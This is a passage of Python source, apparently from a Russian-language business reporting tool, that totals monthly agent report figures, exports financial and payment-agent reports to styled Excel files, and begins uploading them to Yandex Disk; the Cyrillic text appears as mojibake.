self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][2] += \
self.itog_report_month[tariff][1]
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += \
self.itog_report_month[tariff][1]
if tariff != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += \
self.itog_report_month[tariff][1]
else:
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]] = []
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
append(['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0])
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
append([tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]])
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][2] += \
self.itog_report_month[tariff][1]
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += \
self.itog_report_month[tariff][1]
if tariff != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += \
self.itog_report_month[tariff][1]
except KeyError:
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]] = []
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
append(['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0])
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
append((tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]))
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][2] += \
self.itog_report_month[tariff][1]
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += \
self.itog_report_month[tariff][1]
if tariff != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1] += \
self.itog_report_month[tariff][0]
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += \
self.itog_report_month[tariff][1]
except KeyError:
pass
except TypeError:
pass
if self.agentreport_dict_month['ะะขะะะ'][''][1][2] != \
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] or \
self.agentreport_dict_month['ะะขะะะ'][''][1][1] != \
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1]:
self.show_dialog("ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
ััะผะผ.",
f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.agentreport_dict_month['ะะขะะะ'][''][1][1]}: "
f"{self.agentreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
f"({self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1]}: "
f"{self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2]})"
)
logging.error(f"{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
ััะผะผ. "
f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.agentreport_dict_month['ะะขะะะ'][''][1][1]}: "
f"{self.agentreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
f"({self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1]}: "
f"{self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2]})")
def export_fin_report(self):
"""
ะกะพั
ัะฐะฝัะตั ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั ะฒ ะฒะธะดะต Excel-ัะฐะนะปะฐ ะฒ ะปะพะบะฐะปัะฝัั ะดะธัะตะบัะพัะธั
"""
# ะพะฟัะตะดะตะปัะตะผ ััะธะปะธ
h1 = Font(name='Times New Roman',
size=18,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font = Font(name='Times New Roman',
size=9,
bold=False,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font_bold = Font(name='Times New Roman',
size=9,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
fill = PatternFill(fill_type='solid',
start_color='c1c1c1',
end_color='c2c2c2')
table_color = PatternFill(fill_type='solid',
start_color='e2e2e2',
end_color='e9e9e9')
align_top = Alignment(horizontal='general',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
align_top_center = Alignment(horizontal='center',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
border = Border(left=Side(border_style='thin',
color='FF000000'),
right=Side(border_style='thin',
color='FF000000'),
top=Side(border_style='thin',
color='FF000000'),
bottom=Side(border_style='thin',
color='FF000000'),
diagonal=Side(border_style='thin',
color='FF000000'),
diagonal_direction=0,
outline=Side(border_style='thin',
color='FF000000'),
vertical=Side(border_style='thin',
color='FF000000'),
horizontal=Side(border_style='thin',
color='FF000000')
)
align_left = Alignment(horizontal='left',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
number_format = 'General'
protection = Protection(locked=True,
hidden=False)
column = ['', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
self.row = '0'
def next_row():
self.row = str(int(self.row) + 1)
return self.row
# ะพะฑัะตะบั
wb = Workbook()
# ะฐะบัะธะฒะฝัะน ะปะธัั
ws = wb.active
# ะฝะฐะทะฒะฐะฝะธะต ัััะฐะฝะธัั
# ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
ws.title = 'ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั'
# ััะธััั
ws['A1'].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws['A1'].alignment = align_left
# ะจะธัะธะฝะฐ ัััะพะปะฑัะพะฒ
ws.column_dimensions['A'].width = 1 / 7 * 67
ws.column_dimensions['B'].width = 1 / 7 * 95
ws.column_dimensions['C'].width = 1 / 7 * 87
ws.column_dimensions['D'].width = 1 / 7 * 87
ws.column_dimensions['E'].width = 1 / 7 * 47
ws.column_dimensions['F'].width = 1 / 7 * 87
ws.column_dimensions['G'].width = 1 / 7 * 87
ws.column_dimensions['H'].width = 1 / 7 * 47
ws.column_dimensions['I'].width = 1 / 7 * 87
ws.column_dimensions['J'].width = 1 / 7 * 87
ws.column_dimensions['K'].width = 1 / 7 * 47
ws.column_dimensions['L'].width = 1 / 7 * 87
ws.column_dimensions['M'].width = 1 / 7 * 87
ws.column_dimensions['N'].width = 1 / 7 * 47
ws.column_dimensions['O'].width = 1 / 7 * 87
ws.column_dimensions['P'].width = 1 / 7 * 87
ws.column_dimensions['Q'].width = 1 / 7 * 47
ws.column_dimensions['R'].width = 1 / 7 * 87
ws.column_dimensions['S'].width = 1 / 7 * 87
ws.column_dimensions['T'].width = 1 / 7 * 47
ws.column_dimensions['U'].width = 1 / 7 * 87
ws.column_dimensions['V'].width = 1 / 7 * 47
ws.column_dimensions['W'].width = 1 / 7 * 87
ws.column_dimensions['X'].width = 1 / 7 * 87
ws.column_dimensions['Y'].width = 1 / 7 * 87
ws.column_dimensions['Z'].width = 1 / 7 * 87
# ะทะฝะฐัะตะฝะธะต ััะตะนะบะธ
# ws['A1'] = "Hello!"
ws[column[1] + next_row()] = 'ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
# ััะธััั
ws[column[1] + self.row].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws[column[1] + self.row].alignment = align_left
# ะััะพัะฐ ัััะพะบ
ws.row_dimensions[1].height = 24
ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[2] + self.row] = (self.finreport_dict["ะะฐัะฐ"][0]).strftime("%d.%m.%Y")
ws[column[2] + self.row].font = font_bold
ws[column[2] + self.row].alignment = align_top
ws[column[3] + self.row] = 'ะฟะพ'
ws[column[3] + self.row].font = font
ws[column[3] + self.row].alignment = align_top
ws[column[4] + self.row] = (self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1)).strftime("%d.%m.%Y")
ws[column[4] + self.row].font = font_bold
ws[column[4] + self.row].alignment = align_top
# ะขะะะะะฆะ
self.color = False
def merge_table():
# ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=4)
for b in range(1, 27):
ws[column[b] + self.row].font = font
ws[column[b] + self.row].alignment = align_top
if b not in (1, 2, 5, 8, 11, 14, 17, 20, 22):
ws[column[b] + self.row].number_format = '#,##0.00 โฝ'
ws[column[b] + self.row].border = border
if self.color:
b = 1
while b < len(column):
ws[column[b] + self.row].fill = table_color
b += 1
self.color = False
else:
self.color = True
ws[column[1] + next_row()] = 'ะะฐัะฐ'
ws.merge_cells(start_row=self.row, start_column=1, end_row=str(int(self.row) + 1), end_column=1)
ws[column[2] + self.row] = 'ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'
ws.merge_cells(start_row=self.row, start_column=2, end_row=str(int(self.row) + 1), end_column=2)
ws[column[3] + self.row] = 'ะะฑัะฐั ััะผะผะฐ'
ws.merge_cells(start_row=self.row, start_column=3, end_row=str(int(self.row) + 1), end_column=3)
ws[column[4] + self.row] = 'ะกัะผะผะฐ KPI'
ws.merge_cells(start_row=self.row, start_column=4, end_row=str(int(self.row) + 1), end_column=4)
ws[column[5] + self.row] = 'ะะธะปะตัั'
ws.merge_cells(start_row=self.row, start_column=5, end_row=self.row, end_column=7)
ws[column[8] + self.row] = 'ะะธะปะตัั ะะะ ะ'
ws.merge_cells(start_row=self.row, start_column=8, end_row=self.row, end_column=10)
ws[column[11] + self.row] = 'ะขะตัะผะพะทะพะฝะฐ'
ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=13)
ws[column[14] + self.row] = 'ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'
ws.merge_cells(start_row=self.row, start_column=14, end_row=self.row, end_column=16)
ws[column[17] + self.row] = 'ะะฑัะตะฟะธั'
ws.merge_cells(start_row=self.row, start_column=17, end_row=self.row, end_column=19)
ws[column[20] + self.row] = 'ะัะพัะตะต'
ws.merge_cells(start_row=self.row, start_column=20, end_row=self.row, end_column=21)
ws[column[22] + self.row] = 'Online ะัะพะดะฐะถะธ'
ws.merge_cells(start_row=self.row, start_column=22, end_row=self.row, end_column=24)
ws[column[25] + self.row] = 'ะกัะผะผะฐ ะฑะตะทะฝะฐะป'
ws.merge_cells(start_row=self.row, start_column=25, end_row=str(int(self.row) + 1), end_column=25)
ws[column[26] + self.row] = 'ะกัะผะผะฐ Biglion'
ws.merge_cells(start_row=self.row, start_column=26, end_row=str(int(self.row) + 1), end_column=26)
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
b = 1
while b < len(column):
ws[column[b] + self.row].fill = fill
b += 1
for b in range(1, 27):
ws[column[b] + self.row].font = font
ws[column[b] + self.row].alignment = align_top_center
ws[column[b] + self.row].border = border
ws[column[5] + next_row()] = 'ะะพะป-ะฒะพ'
ws[column[6] + self.row] = 'ะกัะผะผะฐ'
ws[column[7] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[8] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[9] + self.row] = 'ะกัะผะผะฐ'
ws[column[10] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[11] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[12] + self.row] = 'ะกัะผะผะฐ'
ws[column[13] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[14] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[15] + self.row] = 'ะกัะผะผะฐ'
ws[column[16] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[17] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[18] + self.row] = 'ะกัะผะผะฐ'
ws[column[19] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[20] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[21] + self.row] = 'ะกัะผะผะฐ'
ws[column[22] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[23] + self.row] = 'ะกัะผะผะฐ'
ws[column[24] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
b = 1
while b < len(column):
ws[column[b] + self.row].fill = fill
b += 1
for b in range(1, 27):
ws[column[b] + self.row].font = font
ws[column[b] + self.row].alignment = align_top_center
ws[column[b] + self.row].border = border
if self.finreport_dict['ะะฐัะฐ'][0] == self.finreport_dict['ะะฐัะฐ'][1] - timedelta(1):
date_ = datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")
else:
date_ = f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1), "%Y-%m-%d")}'
ws[column[1] + next_row()] = date_
ws[column[2] + self.row] = self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'][0]
ws[column[3] + self.row] = self.finreport_dict['ะะขะะะ'][1]
ws[column[4] + self.row] = f'=C{self.row}-U{self.row}+W{self.row}+Y{self.row}+Z{self.row}'
ws[column[5] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][0]
ws[column[6] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][1]
ws[column[7] + self.row] = f'=ะะกะะะะจะะะะ(F{self.row}/E{self.row},0)'
ws[column[8] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][0]
ws[column[9] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][0]
ws[column[10] + self.row] = f'=ะะกะะะะจะะะะ(I{self.row}/H{self.row},0)'
ws[column[11] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][0]
ws[column[12] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][1]
ws[column[13] + self.row] = f'=ะะกะะะะจะะะะ(L{self.row}/K{self.row},0)'
ws[column[14] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][0]
ws[column[15] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][1]
ws[column[16] + self.row] = f'=ะะกะะะะจะะะะ(O{self.row}/N{self.row},0)'
ws[column[17] + self.row] = self.finreport_dict['ะะฑัะตะฟะธั'][0]
ws[column[18] + self.row] = self.finreport_dict['ะะฑัะตะฟะธั'][1]
ws[column[19] + self.row] = f'=ะะกะะะะจะะะะ(R{self.row}/Q{self.row},0)'
ws[column[20] + self.row] = self.finreport_dict['ะัะพัะตะต'][0]
ws[column[21] + self.row] = self.finreport_dict['ะัะพัะตะต'][1]
ws[column[22] + self.row] = self.finreport_dict['Online ะัะพะดะฐะถะธ'][0]
ws[column[23] + self.row] = self.finreport_dict['Online ะัะพะดะฐะถะธ'][1]
ws[column[24] + self.row] = f'=ะะกะะะะจะะะะ(W{self.row}/V{self.row},0)'
ws[column[25] + self.row] = 0
ws[column[26] + self.row] = 0
merge_table()
# ัะฒะตะปะธัะธะฒะฐะตะผ ะฒัะต ัััะพะบะธ ะฟะพ ะฒััะพัะต
max_row = ws.max_row
i = 2
while i <= max_row:
rd = ws.row_dimensions[i]
rd.height = 18
i += 1
if self.finreport_dict['ะะฐัะฐ'][0] == self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1):
date_ = datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")
else:
date_ = f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][1], "%Y-%m-%d")}'
path = self.local_folder + self.path + date_ + f' ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั' + ".xlsx"
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะฒ {path}')
path = self.create_path(path)
self.save_file(path, wb)
return path
def export_agent_report(self, agentreport_dict):
"""
ะกะพั
ัะฐะฝัะตั ะพััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะฒ ะฒะธะดะต Excel-ัะฐะนะปะฐ ะฒ ะปะพะบะฐะปัะฝัั ะดะธัะตะบัะพัะธั
"""
# ะพะฟัะตะดะตะปัะตะผ ััะธะปะธ
h1 = Font(name='Times New Roman',
size=18,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font = Font(name='Times New Roman',
size=9,
bold=False,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font_bold = Font(name='Times New Roman',
size=9,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
fill = PatternFill(fill_type='solid',
start_color='c1c1c1',
end_color='c2c2c2')
table_color = PatternFill(fill_type='solid',
start_color='e2e2e2',
end_color='e9e9e9')
align_top = Alignment(horizontal='general',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
border = Border(left=Side(border_style='thin',
color='FF000000'),
right=Side(border_style='thin',
color='FF000000'),
top=Side(border_style='thin',
color='FF000000'),
bottom=Side(border_style='thin',
color='FF000000'),
diagonal=Side(border_style='thin',
color='FF000000'),
diagonal_direction=0,
outline=Side(border_style='thin',
color='FF000000'),
vertical=Side(border_style='thin',
color='FF000000'),
horizontal=Side(border_style='thin',
color='FF000000')
)
align_left = Alignment(horizontal='left',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
number_format = 'General'
protection = Protection(locked=True,
hidden=False)
column = ['', 'A', 'B', 'C', 'D', 'E']
self.row = '0'
def next_row():
self.row = str(int(self.row) + 1)
return self.row
# ะพะฑัะตะบั
wb = Workbook()
# ะฐะบัะธะฒะฝัะน ะปะธัั
ws = wb.active
# ะฝะฐะทะฒะฐะฝะธะต ัััะฐะฝะธัั
# ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
ws.title = 'ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ'
# ััะธััั
ws['A1'].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws['A1'].alignment = align_left
# ะจะธัะธะฝะฐ ัััะพะปะฑัะพะฒ
ws.column_dimensions['A'].width = 1 / 7 * 124
ws.column_dimensions['B'].width = 1 / 7 * 80
ws.column_dimensions['C'].width = 1 / 7 * 24
ws.column_dimensions['D'].width = 1 / 7 * 175
ws.column_dimensions['E'].width = 1 / 7 * 200
# ะทะฝะฐัะตะฝะธะต ััะตะนะบะธ
# ws['A1'] = "Hello!"
ws[column[1] + next_row()] = 'ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะฟะพ ะฟัะธะตะผั ะดะตะฝะตะถะฝัั
ััะตะดััะฒ'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column)-1)
# ััะธััั
ws[column[1] + self.row].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws[column[1] + self.row].alignment = align_left
# ะััะพัะฐ ัััะพะบ
ws.row_dimensions[1].height = 24
ws[column[1] + next_row()] = f'{agentreport_dict["ะัะณะฐะฝะธะทะฐัะธั"][1]}'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[2] + self.row] = (agentreport_dict["ะะฐัะฐ"][0]).strftime("%d.%m.%Y")
ws[column[2] + self.row].font = font_bold
ws[column[2] + self.row].alignment = align_top
ws[column[3] + self.row] = 'ะฟะพ'
ws[column[3] + self.row].font = font
ws[column[3] + self.row].alignment = align_top
ws[column[4] + self.row] = (agentreport_dict["ะะฐัะฐ"][1] - timedelta(1)).strftime("%d.%m.%Y")
ws[column[4] + self.row].font = font_bold
ws[column[4] + self.row].alignment = align_top
# ะขะะะะะฆะ
self.color = False
def merge_table():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=4)
ws[column[1] + self.row].font = font
ws[column[5] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[5] + self.row].alignment = align_top
ws[column[5] + self.row].number_format = '#,##0.00 โฝ'
b = 1
while b < len(column):
ws[column[b] + self.row].border = border
b += 1
if self.color:
b = 1
while b < len(column):
ws[column[b] + self.row].fill = table_color
b += 1
self.color = False
else:
self.color = True
def merge_table_bold():
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=4)
ws[column[1] + self.row].font = font_bold
ws[column[5] + self.row].font = font_bold
ws[column[1] + self.row].alignment = align_top
ws[column[5] + self.row].alignment = align_top
b = 1
while b < len(column):
ws[column[b] + self.row].border = border
b += 1
ws[column[1] + next_row()] = 'ะะฐะธะผะตะฝะพะฒะฐะฝะธะต ะฟะพััะฐะฒัะธะบะฐ ััะปัะณ'
ws[column[5] + self.row] = 'ะกัะผะผะฐ'
merge_table_bold()
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
b = 1
while b < len(column):
ws[column[b] + self.row].fill = fill
b += 1
itog_sum = 0
for line in agentreport_dict:
if line != 'ะัะณะฐะฝะธะทะฐัะธั' and line != 'ะะฐัะฐ' and line != 'ะะขะะะ':
try:
itog_sum += agentreport_dict[line][1]
ws[column[1] + next_row()] = line
ws[column[5] + self.row] = agentreport_dict[line][1]
merge_table()
except AttributeError:
pass
ws[column[1] + next_row()] = 'ะัะพะณะพ'
if itog_sum != agentreport_dict['ะะขะะะ'][1]:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ. ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ: ััะผะผะฐ ัััะพะบ '
f'({itog_sum}) ะฝะต ัะฐะฒะฝะฐ ัััะพะบะต ะะขะะะ '
f'({agentreport_dict["ะะขะะะ"][1]})')
self.show_dialog(f'ะัะธะฑะบะฐ. ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ', f'ะัะธะฑะบะฐ. ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ: ััะผะผะฐ ัััะพะบ '
f'({itog_sum}) ะฝะต ัะฐะฒะฝะฐ ัััะพะบะต ะะขะะะ '
f'({agentreport_dict["ะะขะะะ"][1]})')
ws[column[5] + self.row] = itog_sum
ws[column[5] + self.row].number_format = '#,##0.00 โฝ'
merge_table_bold()
# ัะฒะตะปะธัะธะฒะฐะตะผ ะฒัะต ัััะพะบะธ ะฟะพ ะฒััะพัะต
max_row = ws.max_row
i = 2
while i <= max_row:
rd = ws.row_dimensions[i]
rd.height = 18
i += 1
if agentreport_dict['ะะฐัะฐ'][0] == agentreport_dict["ะะฐัะฐ"][1] - timedelta(1):
date_ = datetime.strftime(agentreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")
else:
date_ = f'{datetime.strftime(agentreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(agentreport_dict["ะะฐัะฐ"][1], "%Y-%m-%d")}'
path = self.local_folder + self.path + date_ + f' ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ {agentreport_dict["ะัะณะฐะฝะธะทะฐัะธั"][1]}' + ".xlsx"
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะพััะตัะฐ ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ '
f'{agentreport_dict["ะัะณะฐะฝะธะทะฐัะธั"][1]} ะฒ {path}')
path = self.create_path(path)
self.save_file(path, wb)
return path
def create_path(self, path):
"""
ะัะพะฒะตััะตั ะฝะฐะปะธัะธะต ัะบะฐะทะฐะฝะฝะพะณะพ ะฟััะธ. ะ ัะปััะฐะต ะพััััััะฒะธั ะบะฐะบะธั
-ะปะธะฑะพ ะฟะฐะฟะพะบ ัะพะทะดะฐะตั ะธั
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะพะฒะตัะบะฐ ะปะพะบะฐะปัะฝัั
ะฟััะตะน ัะพั
ัะฐะฝะตะฝะธั ัะฐะนะปะพะฒ...')
list_path = path.split('/')
path = ''
end_path = ''
if list_path[-1][-4:] == '.xls' or list_path[-1]:
end_path = list_path.pop()
list_path.append(self.date_from.strftime('%Y'))
list_path.append(self.date_from.strftime('%m') + '-' + self.date_from.strftime('%B'))
directory = os.getcwd()
for folder in list_path:
if folder not in os.listdir():
os.mkdir(folder)
logging.warning(f'{__name__}: {str(datetime.now())[:-7]}: ะ ะดะธัะตะบัะพัะธะธ "{os.getcwd()}" ัะพะทะดะฐะฝะฐ ะฟะฐะฟะบะฐ "{folder}"')
os.chdir(folder)
else:
os.chdir(folder)
path += folder + '/'
path += end_path
os.chdir(directory)
return path
def save_file(self, path, file):
"""
ะัะพะฒะตััะตั ะฝะต ะทะฐะฝัั ะปะธ ัะฐะนะป ะดััะณะธะผ ะฟัะพัะตััะพะผ ะธ ะตัะปะธ ะฝะตั, ัะพ ะฟะตัะตะทะฐะฟะธััะฒะฐะตั ะตะณะพ, ะฒ ะฟัะพัะธะฒะฝะพะผ
ัะปััะฐะต ะฒัะฒะพะดะธั ะดะธะฐะปะพะณะพะฒะพะต ะพะบะฝะพ ั ะฟัะตะดะปะพะถะตะฝะธะตะผ ะทะฐะบัััั ัะฐะนะป ะธ ะฟัะพะดะพะปะถะธัั
"""
try:
file.save(path)
except PermissionError as e:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะคะฐะนะป "{path}" ะทะฐะฝัั ะดััะณะธะผ ะฟัะพัะตััะพะผ.\n{repr(e)}')
self.show_dialog(f'ะัะธะฑะบะฐ ะทะฐะฟะธัะธ ัะฐะนะปะฐ',
f'ะคะฐะนะป "{path}" ะทะฐะฝัั ะดััะณะธะผ ะฟัะพัะตััะพะผ.\nะะปั ะฟะพะฒัะพัะฐ ะฟะพะฟััะบะธ ะทะฐะบัะพะนัะต ััะพ ัะพะพะฑัะตะฝะธะต',
func=self.save_file, path=path, file=file)
def sync_to_yadisk(self, path_list, token):
"""
ะะพะฟะธััะตั ะปะพะบะฐะปัะฝัะต ัะฐะนะปั ะฒ ะฏะฝะดะตะบั ะะธัะบ
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฟะธัะพะฒะฐะฝะธะต ะพััะตัะพะฒ ะฒ ะฏะฝะดะตะบั.ะะธัะบ...')
if path_list:
if self.use_yadisk:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะตะดะธะฝะตะฝะธะต ั YaDisk...')
self.yadisk = yadisk.YaDisk(token=token)
if self.yadisk.check_token():
path = '' + self.path
remote_folder = self.create_path_yadisk(path)
for local_path in path_list:
remote_path = remote_folder + local_path.split('/')[-1]
